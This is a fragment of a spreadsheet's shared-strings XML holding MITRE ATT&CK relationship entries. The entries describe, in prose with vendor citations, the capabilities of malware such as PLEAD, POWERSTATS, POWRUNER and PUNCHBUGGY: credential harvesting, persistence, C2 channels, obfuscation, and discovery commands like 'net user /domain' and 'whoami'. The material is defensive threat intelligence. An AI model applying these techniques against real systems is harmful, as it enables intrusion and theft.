  </si>
  <si>
    <t>relationship--5dd0d491-bb82-45b4-91cd-a7d9e4cf396e</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>relationship--f1952dea-f9d6-421b-947e-502796e2c883</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--947a4837-cce1-48dd-b4e7-8d08d8dce663</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>relationship--884019ca-fca8-46a8-8dc4-71f60427db0f</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>relationship--9020d567-103b-4dc2-b27d-115078ae2a76</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--8ee24ce1-0703-43dc-8b27-807747ca0209</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--80389d5a-b92b-4101-930b-5be361e53eb8</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--a77818b1-bbe8-477f-a8b1-1704e525d5a9</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) can use `ShellExecute` to execute applications.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--c587fc65-b591-4a23-bb5a-f2971c427ba0</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--dd4da2e6-a54b-4420-9ed6-ebb3080bd2f8</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>relationship--6e23cb4f-61dd-4a6a-8c25-7eb79c376558</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>relationship--f09f6c15-193c-406a-ab64-bf730d83f39f</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--213423ab-05cf-4354-9cea-d536686cf21d</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>relationship--21711eb2-eddd-40f5-8c20-dc50495c102d</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has used AOL Instant Messenger for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--d122e56a-b0d7-4eb2-bcee-def5d4cbf5bd</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has been delivered through compromised sites acting as watering holes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--f32828b5-ab55-4bf5-af89-1d6e42d559b0</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can conduct file browsing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--17c43eed-f8a2-42cb-8f0a-f31978e9e351</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--d2638428-d31e-4ea4-80e1-26c9c25472d6</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can perform screen capturing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--4e2f4bbd-ea3b-4996-bc2a-3d670d9f5cf5</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can identify system information, including battery status.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--f14c6ecd-4997-44aa-9d29-232195fd4a82</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) encrypts C2 traffic with AES and RSA.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--b380ad90-2f3b-4f98-ae23-3dfdba448e0a</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uploads data in 2048-byte chunks.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--3e497bf1-4fdc-40a2-b8a2-3492c1d605e5</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a DGA to derive command and control URLs from a word list.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--489a8a76-4264-462f-be66-217e57d3e907</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) downloads and executes additional PowerShell code and Windows binaries.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--be31bf6d-ce4f-4620-8940-445f35ff90a7</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--70edcba2-e777-4ced-a52d-5dfc3965211c</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses PowerShell to execute various commands, one to execute its payload.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--8d5d9206-a213-465d-b384-6152eb2796a0</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--d57d1a71-6ac7-4028-ba73-86e5df98395f</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a WMI event subscription to establish persistence.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--f758836e-91b2-4651-ba72-d827553b668c</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--c560f682-0d21-4c9b-b35d-33aec2287117</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) has been observed being used to download [TEXTMATE](https://attack.mitre.org/software/S0146) and the Cobalt Strike Beacon payload onto victims.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>relationship--d04d6101-f6f6-42a2-8679-351956b75228</t>
  </si>
  <si>
    <t>If the victim is using PowerShell 3.0 or later, [POWERSOURCE](https://attack.mitre.org/software/S0145) writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--bc838675-63af-45c5-9a30-081b5f5ac0d7</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--89424d69-a426-4f76-9e7f-7b2dabe459be</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) queries Registry keys in preparation for setting Run keys to achieve persistence.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--9c79076c-341f-4eb3-bed7-300723747b18</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--afa1f53f-abd9-4e57-b4e1-4e161dd34e9b</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has encrypted C2 traffic with RSA.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--baeff271-0885-4c44-a9d6-c03411ca9bb0</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--ee47ad7d-0c85-46fb-a4f7-047fdff09a03</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</si>
  <si>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</si>
  <si>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relationship--baf31b81-e175-49e3-b2d9-d7552ea902a1</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--048df7c4-96b0-4b76-9e21-f9ad70a2ce9b</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can upload files from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--9dcc9cb1-d489-42ab-b647-3a492c04c114</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can deobfuscate the main backdoor code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--1477187e-7bd8-4622-8c2d-e5978c1fd29f</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can disable Microsoft Office Protected View by changing Registry keys.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--274c31fe-0724-4c26-b389-fedafa37f7df</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DDE to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--84a213fc-604f-441f-ba18-feab32085a50</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has connected to C2 servers through proxies.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--6fb86c58-666c-4a5f-bdd1-417a77761e6f</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\, D:\, E:\ and, F:\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--c18652f6-e25c-4e01-bec2-04204a50cf23</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--ce7b27ac-fff6-4d3c-bceb-50c16f462552</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use JavaScript code for execution.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--cb36459a-d37c-424f-8130-55cf8d29417e</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve usernames from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--2d1bee29-c394-48ca-8ded-21fd86e3ff43</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has created a scheduled task named "MicrosoftEdge" to establish persistence.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--2ccf654b-1077-4277-9a24-099fb3bf095f</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--3cd0e385-3c60-4742-b3a6-c07dbf10ba45</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--911c0e63-10bc-4fbd-b7b7-0a9e318bb4f1</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used &lt;code&gt;get_tasklist&lt;/code&gt; to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--ff3b4b17-7d3f-43a9-8e9a-ce56909da725</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</si>
  <si>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</si>
  <si>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relationship--b853cee3-a145-407f-83fe-dd52c4efbe2f</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can sleep for a given number of seconds.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--44671cd3-9bdd-4e9f-a7d1-a322d0abf659</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--e93c8f61-b2c9-4877-8c2c-12bd37aa5a87</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has detected security tools.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--3caf848c-d95b-40ae-a288-2905319e4005</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) encoded C2 traffic with base64.(Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>relationship--6f9916d0-70c3-4504-93cf-cd0e8dd7ead1</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--4e88ec20-d309-440d-a685-0d2abdc1d7ef</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--927e8d82-d094-4170-bc76-10717ffd8d7f</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--1567eaca-2b2e-44df-b447-87769738e00a</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--c5d09de5-7a1e-45b5-a7ac-1637e8fe8eff</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use WMI queries to retrieve data from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--42cc506f-e9c2-43f1-a68f-3c6973cca2dc</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is written in PowerShell.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--570da7ec-2d72-4e1b-9f30-f0e1a10085bf</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can install a Registry Run key for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--e4465d76-d212-4f14-8493-c9c5d7c8a6f4</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has the ability to dump password hashes.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--b8133b35-52b8-4407-9845-a00b6a739cdc</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used AES for encrypting C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--2624fd3f-9282-4080-bace-6a673fd31b9f</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--3c98448a-15ec-4a51-8c41-8f1379d2dc0a</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can use WMI for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--ff53be5e-2a57-4a9e-a0c1-cc075c1331c4</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use DNS for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--49363ea2-b33e-4cc4-a283-ab7d30530c27</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--61dd6d75-a95b-488d-9a1d-924563592df7</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect domain group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--533deac3-2f27-4256-bb11-7d68d8824d47</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may enumerate user directories on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--9670979e-9785-45f0-a470-f591c97f6f8a</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can download or upload files from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--c4d77981-d2e4-4a12-8e52-5b7464cdc8fd</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect local group information by running &lt;code&gt;net localgroup administrators&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5650777d-f905-4c09-8fd0-0e205178a830</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--b4c7e12f-6921-4007-ab15-595969bf9eca</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect process information by running &lt;code&gt;tasklist&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--408db284-4c7a-4ad4-8399-90a8102b4bfa</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--d078f862-c090-4e79-808b-ff69887a920c</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) persists through a scheduled task that executes it every minute.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--ea5f9e1f-68fb-46dd-9e09-f66066808d0c</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can capture a screenshot from a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--ed522c9c-038b-43c0-af66-e81b954104f2</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--52781f1e-4b91-4ff2-8f48-89e15bc40d42</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use base64 encoded C2 communications.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--b9109cd5-1b13-4376-a761-b68302879351</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the system by running &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a88332d2-d03f-4139-b11c-19e82459189b</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect network configuration data by running &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--0bd2ee1a-6202-4ff5-9a42-4869a276a92c</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--e0cf8a56-e8e1-43b0-9efc-f167d1cf21de</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5183147b-4563-4a01-a360-a419691e35f8</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--14b70990-48b0-482b-bd5a-3a99d9d9a653</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can execute commands from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--aabb13d6-a73b-42aa-8014-696b94ff2416</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may use WMI when collecting information about a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--35419603-7bc2-40f6-8e5d-4e7a8f13ebb7</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can use an XOR key to decrypt a PowerShell loader and payload binary.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--bf9adcbf-3d35-4d70-b681-e7180f3c08da</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can inject its payload DLL Into memory.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--1e075dae-a0df-4ab9-a297-fda2248bc254</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can download additional payloads onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--107f8870-4adf-4f63-acf2-d28677905235</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) is distributed as a set of encrypted files and scripts.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--798a3e14-1c98-4bac-af2d-137367f78912</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can utilize a PowerShell loader.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--5cb2c8db-bd76-4a39-be55-6de6864cb129</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can establish using a AppCertDLLs Registry key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--1177ad8a-d57f-4882-be1f-c327e08017d2</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has Gzipped information and saved it to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>relationship--73faed96-608b-4740-894f-0e2eaee92343</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) to decode base64-encoded assembly.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--bdd9a384-2d57-4238-bddd-5500e667d620</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--c935fb02-a2a4-448e-adc0-2b220fc8d521</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can download additional files and payloads to compromised hosts.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--8e7887b3-f622-4860-9bda-3f4ab6231393</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather user names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--2b2026c2-eb71-4c78-825d-5c4d0a747741</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has saved information to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--992d6f04-7454-4211-9a44-a5c87fdb7657</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--5a1876a1-144f-4416-b9bf-6df819613962</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has hashed most its code's functions and encrypted payloads with base64 and XOR.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--e2e74982-a4a6-428f-888a-a910453b7e82</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--8dbcee86-c9db-4ae3-ba16-29056a8a1593</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--0b4ebc81-20fe-45f1-a93f-e6ca03c89114</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has been observed using a Registry Run key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--559c0d59-16a7-4c1c-801d-6c8c32ffc5ce</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--107267dc-0620-42b3-8287-f49ce2ea4f8f</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather AVs registered in the system.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>relationship--3c0cb507-2bf0-46ab-b5c2-ba2865397722</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using the LoadLibrary API.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--163c1ca5-c5cb-4cc8-b9e4-d0a137d41e52</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather system information such as computer names.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>relationship--ec85433f-2635-4e7c-af49-6dbfb269dbbd</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>relationship--ae3a87db-018b-441d-bc5c-4f7e30ce5551</t>
